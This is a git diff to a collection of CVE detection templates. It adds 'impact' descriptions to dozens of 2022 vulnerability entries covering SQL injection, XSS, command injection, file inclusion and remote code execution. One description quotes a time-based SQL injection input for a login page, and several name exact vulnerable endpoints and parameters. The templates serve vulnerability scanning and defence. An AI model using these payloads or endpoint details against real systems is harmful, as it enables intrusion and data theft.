diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 20fa124c69..660622cfcd 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24288.yaml b/http/cves/2022/CVE-2022-24288.yaml index 739b46bcdb..5b213df5de 100644 --- a/http/cves/2022/CVE-2022-24288.yaml +++ b/http/cves/2022/CVE-2022-24288.yaml @@ -5,6 +5,8 @@ info: author: xeldax severity: high description: Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system. remediation: | Apply the latest security patches or upgrade to a patched version of Apache Airflow. reference: diff --git a/http/cves/2022/CVE-2022-24384.yaml b/http/cves/2022/CVE-2022-24384.yaml index b91a179cef..1cbb4097a8 100644 --- a/http/cves/2022/CVE-2022-24384.yaml +++ b/http/cves/2022/CVE-2022-24384.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by SmarterTools to fix this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2462.yaml b/http/cves/2022/CVE-2022-2462.yaml index 140b5e988e..e3f1e1ed9a 100644 --- a/http/cves/2022/CVE-2022-2462.yaml +++ b/http/cves/2022/CVE-2022-2462.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Upgrade to the latest version of the WordPress Transposh plugin (>=1.0.8.2) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 2085cd680e..133b688696 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Garage Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-24681.yaml b/http/cves/2022/CVE-2022-24681.yaml index 0bdac27064..9a245f8691 100644 --- a/http/cves/2022/CVE-2022-24681.yaml +++ b/http/cves/2022/CVE-2022-24681.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens. + impact: | + Successful exploitation of this vulnerability could lead to the execution of arbitrary scripts or theft of sensitive information. remediation: | Upgrade to a version of ManageEngine ADSelfService Plus that is higher than 6121 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24716.yaml b/http/cves/2022/CVE-2022-24716.yaml index b3da1f1325..d12a886213 100644 --- a/http/cves/2022/CVE-2022-24716.yaml +++ b/http/cves/2022/CVE-2022-24716.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data. remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated. reference: - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py diff --git a/http/cves/2022/CVE-2022-24816.yaml b/http/cves/2022/CVE-2022-24816.yaml index ca453a3fb0..d7fa0e63bd 100644 --- a/http/cves/2022/CVE-2022-24816.yaml +++ b/http/cves/2022/CVE-2022-24816.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system. remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath. reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html diff --git a/http/cves/2022/CVE-2022-24856.yaml b/http/cves/2022/CVE-2022-24856.yaml index 41a8453ddb..95fe57c73c 100644 --- a/http/cves/2022/CVE-2022-24856.yaml +++ b/http/cves/2022/CVE-2022-24856.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur. + impact: | + An attacker can exploit this vulnerability to perform unauthorized actions, such as accessing internal resources, bypassing security controls, or launching further attacks. remediation: | The patch for this issue deletes the entire cors_proxy, as this is no longer required for the console. A patch is available in FlyteConsole version 0.52.0, or as a work-around disable FlyteConsole. reference: diff --git a/http/cves/2022/CVE-2022-2486.yaml b/http/cves/2022/CVE-2022-2486.yaml index c264ef9908..1c6776d1b7 100644 --- a/http/cves/2022/CVE-2022-2486.yaml +++ b/http/cves/2022/CVE-2022-2486.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2487.yaml b/http/cves/2022/CVE-2022-2487.yaml index dd1b572bee..4f50d7d1d4 100644 --- a/http/cves/2022/CVE-2022-2487.yaml +++ b/http/cves/2022/CVE-2022-2487.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection which affects unknown code in /cgi-bin/nightled.cgi via manipulation of the argument start_hour. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2488.yaml b/http/cves/2022/CVE-2022-2488.yaml index d4ea79ae06..898156ea1d 100644 --- a/http/cves/2022/CVE-2022-2488.yaml +++ b/http/cves/2022/CVE-2022-2488.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in /cgi-bin/touchlist_sync.cgi via manipulation of the argument IP. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-24899.yaml b/http/cves/2022/CVE-2022-24899.yaml index 7fb466b432..2f1e67ba9c 100644 --- a/http/cves/2022/CVE-2022-24899.yaml +++ b/http/cves/2022/CVE-2022-24899.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Contao prior to 4.13.3 contains a cross-site scripting vulnerability. It is possible to inject arbitrary JavaScript code into the canonical tag. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: As a workaround, users may disable canonical tags in the root page settings. reference: - https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/ diff --git a/http/cves/2022/CVE-2022-24900.yaml b/http/cves/2022/CVE-2022-24900.yaml index 875af10712..8b82855b81 100644 --- a/http/cves/2022/CVE-2022-24900.yaml +++ b/http/cves/2022/CVE-2022-24900.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Piano LED Visualizer 1.3 and prior are vulnerable to local file inclusion. + impact: | + An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. remediation: | Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Piano LED Visualizer 1.3 application. reference: diff --git a/http/cves/2022/CVE-2022-24990.yaml b/http/cves/2022/CVE-2022-24990.yaml index c58bac8966..f47bb29e07 100644 --- a/http/cves/2022/CVE-2022-24990.yaml +++ b/http/cves/2022/CVE-2022-24990.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure. + impact: | + An attacker can exploit this vulnerability to gain sensitive information about the server, potentially leading to further attacks. remediation: | Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-25082.yaml b/http/cves/2022/CVE-2022-25082.yaml index e0fa2cd327..f52f9cb9f6 100644 --- a/http/cves/2022/CVE-2022-25082.yaml +++ b/http/cves/2022/CVE-2022-25082.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | TOTOLink A950RG V5.9c.4050_B20190424 and V4.1.2cu.5204_B20210112 were discovered to contain a command injection vulnerability in the Main function. This vulnerability allows attackers to execute arbitrary commands via the QUERY_STRING parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network. remediation: | Apply the latest firmware update provided by the vendor to fix the command injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25125.yaml b/http/cves/2022/CVE-2022-25125.yaml index 742ac0bdcc..0789c57360 100644 --- a/http/cves/2022/CVE-2022-25125.yaml +++ b/http/cves/2022/CVE-2022-25125.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | MCMS 5.2.4 contains a SQL injection vulnerability via search.do in the file /mdiy/dict/listExcludeApp. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in MCMS 5.2.4. reference: diff --git a/http/cves/2022/CVE-2022-25216.yaml b/http/cves/2022/CVE-2022-25216.yaml index b1c4c5efb0..e8e9206c58 100644 --- a/http/cves/2022/CVE-2022-25216.yaml +++ b/http/cves/2022/CVE-2022-25216.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: DVDFab 12 Player/PlayerFab is susceptible to local file inclusion which allows a remote attacker to download any file on the Windows file system for which the user account running DVDFab 12 Player (recently renamed PlayerFab) has read-access. + impact: | + The vulnerability allows an attacker to include arbitrary local files, potentially leading to unauthorized access, information disclosure. remediation: | Apply the latest patch or update from the vendor to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25323.yaml b/http/cves/2022/CVE-2022-25323.yaml index 87b134376a..64ed9b59b6 100644 --- a/http/cves/2022/CVE-2022-25323.yaml +++ b/http/cves/2022/CVE-2022-25323.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0. reference: diff --git a/http/cves/2022/CVE-2022-25356.yaml b/http/cves/2022/CVE-2022-25356.yaml index 879029043c..51205d339b 100644 --- a/http/cves/2022/CVE-2022-25356.yaml +++ b/http/cves/2022/CVE-2022-25356.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious XML code, leading to various security risks such as information disclosure, privilege escalation. remediation: | Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2544.yaml b/http/cves/2022/CVE-2022-2544.yaml index ec9e8097c3..bd391e0bd9 100644 --- a/http/cves/2022/CVE-2022-2544.yaml +++ b/http/cves/2022/CVE-2022-2544.yaml @@ -5,6 +5,8 @@ info: author: tess severity: high description: WordPress Ninja Job Board plugin prior to 1.3.3 is susceptible to a direct request vulnerability. The plugin does not protect the directory where it stores uploaded resumes, making it vulnerable to unauthenticated directory listing which allows the download of uploaded resumes. + impact: | + An attacker can access sensitive files and potentially obtain sensitive information from the target system. remediation: | Update to the latest version of the WordPress Ninja Job Board plugin (1.3.3) to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2546.yaml b/http/cves/2022/CVE-2022-2546.yaml index 2b38bc2f86..276b51d177 100644 --- a/http/cves/2022/CVE-2022-2546.yaml +++ b/http/cves/2022/CVE-2022-2546.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress All-in-One WP Migration plugin 7.62 and prior contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress All-in-One WP Migration plugin (7.63 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25481.yaml b/http/cves/2022/CVE-2022-25481.yaml index 95d0ac2445..69a00cdd09 100644 --- a/http/cves/2022/CVE-2022-25481.yaml +++ b/http/cves/2022/CVE-2022-25481.yaml @@ -6,6 +6,8 @@ info: severity: high description: | ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: | Upgrade to a patched version of ThinkPHP or apply the necessary security patches. reference: diff --git a/http/cves/2022/CVE-2022-25485.yaml b/http/cves/2022/CVE-2022-25485.yaml index 9345261d3c..e5c1cad124 100644 --- a/http/cves/2022/CVE-2022-25485.yaml +++ b/http/cves/2022/CVE-2022-25485.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25486.yaml b/http/cves/2022/CVE-2022-25486.yaml index 0f93b77498..ff1733be8a 100644 --- a/http/cves/2022/CVE-2022-25486.yaml +++ b/http/cves/2022/CVE-2022-25486.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-25487.yaml b/http/cves/2022/CVE-2022-25487.yaml index 2bc0823c0b..5d95019502 100644 --- a/http/cves/2022/CVE-2022-25487.yaml +++ b/http/cves/2022/CVE-2022-25487.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html diff --git a/http/cves/2022/CVE-2022-25488.yaml b/http/cves/2022/CVE-2022-25488.yaml index 59bba62233..9444742781 100644 --- a/http/cves/2022/CVE-2022-25488.yaml +++ b/http/cves/2022/CVE-2022-25488.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/257 diff --git a/http/cves/2022/CVE-2022-25489.yaml b/http/cves/2022/CVE-2022-25489.yaml index 42ce0126ee..6009a4c2ff 100644 --- a/http/cves/2022/CVE-2022-25489.yaml +++ b/http/cves/2022/CVE-2022-25489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/258 diff --git a/http/cves/2022/CVE-2022-25497.yaml b/http/cves/2022/CVE-2022-25497.yaml index 4984429de6..e947d80d35 100644 --- a/http/cves/2022/CVE-2022-25497.yaml +++ b/http/cves/2022/CVE-2022-25497.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2551.yaml b/http/cves/2022/CVE-2022-2551.yaml index 24ff5db36a..440c10f6ad 100644 --- a/http/cves/2022/CVE-2022-2551.yaml 
+++ b/http/cves/2022/CVE-2022-2551.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site. remediation: Fixed in version 1.4.7.1. reference: - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0 diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index 34ce701b43..9d975dbdb3 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks. remediation: | Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26134.yaml b/http/cves/2022/CVE-2022-26134.yaml index ec36fc432b..1c712d60ee 100644 --- a/http/cves/2022/CVE-2022-26134.yaml +++ b/http/cves/2022/CVE-2022-26134.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26138.yaml b/http/cves/2022/CVE-2022-26138.yaml index a8ec7b7274..70db9d5eeb 100644 --- a/http/cves/2022/CVE-2022-26138.yaml +++ b/http/cves/2022/CVE-2022-26138.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Atlassian Questions For Confluence contains a hardcoded credentials vulnerability. When installing versions 2.7.34, 2.7.35, and 3.0.2, a Confluence user account is created in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password can exploit this vulnerability to log into Confluence and access all content accessible to users in the confluence-users group. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Confluence instance. remediation: | Update the Atlassian Questions For Confluence plugin to the latest version, which removes the hardcoded credentials. reference: diff --git a/http/cves/2022/CVE-2022-26148.yaml b/http/cves/2022/CVE-2022-26148.yaml index 82ff1df4ce..b51eaef5b5 100644 --- a/http/cves/2022/CVE-2022-26148.yaml +++ b/http/cves/2022/CVE-2022-26148.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. remediation: | Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26159.yaml b/http/cves/2022/CVE-2022-26159.yaml index 5c266301bc..4bde7efea9 100644 --- a/http/cves/2022/CVE-2022-26159.yaml +++ b/http/cves/2022/CVE-2022-26159.yaml @@ -5,6 +5,8 @@ info: author: Remi Gascou (podalirius) severity: medium description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. remediation: | Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: diff --git a/http/cves/2022/CVE-2022-26233.yaml b/http/cves/2022/CVE-2022-26233.yaml index 16d52cf675..5662594e95 100644 --- a/http/cves/2022/CVE-2022-26233.yaml +++ b/http/cves/2022/CVE-2022-26233.yaml 
@@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26263.yaml b/http/cves/2022/CVE-2022-26263.yaml index 804c77b987..76bbc04cb6 100644 --- a/http/cves/2022/CVE-2022-26263.yaml +++ b/http/cves/2022/CVE-2022-26263.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Yonyou U8 13.0 application. reference: diff --git a/http/cves/2022/CVE-2022-2627.yaml b/http/cves/2022/CVE-2022-2627.yaml index 16c083034d..dd1abcfa31 100644 --- a/http/cves/2022/CVE-2022-2627.yaml +++ b/http/cves/2022/CVE-2022-2627.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Newspaper theme before 12 is susceptible to cross-site scripting. The does not sanitize a parameter before outputting it back in an HTML attribute via an AJAX action. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 12 reference: - https://wpscan.com/vulnerability/038327d0-568f-4011-9b7e-3da39e8b6aea diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index e34f752428..48fe16b622 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin through 2.6.0 is susceptible to arbitrary file download and server-side request forgery (SSRF) via the 'dl' parameter found in the ~/public/video.php file. An attacker can download sensitive files hosted on the affected server and forge requests to the server. + impact: | + An attacker can exploit this vulnerability to send crafted requests to internal resources, potentially leading to unauthorized access, data leakage, or further attacks. remediation: | Update to the latest version of the All-In-One Video Gallery plugin (2.6.0) or apply the vendor-provided patch to fix the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 4a1b284190..b12d81653f 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml 
@@ -5,6 +5,8 @@ info: author: h1ei1 severity: critical description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index d924426d4a..22a09f1fb3 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 5f11e1487b..18892e69a2 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to the affected system. remediation: | Apply the latest security patch or update to the Open Automation Software OAS Platform V16.00.0121 to fix the missing authentication issue. reference: diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index bf002511fb..f56a1496c0 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 87678c5c1d..bbdc7cc5e9 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml 
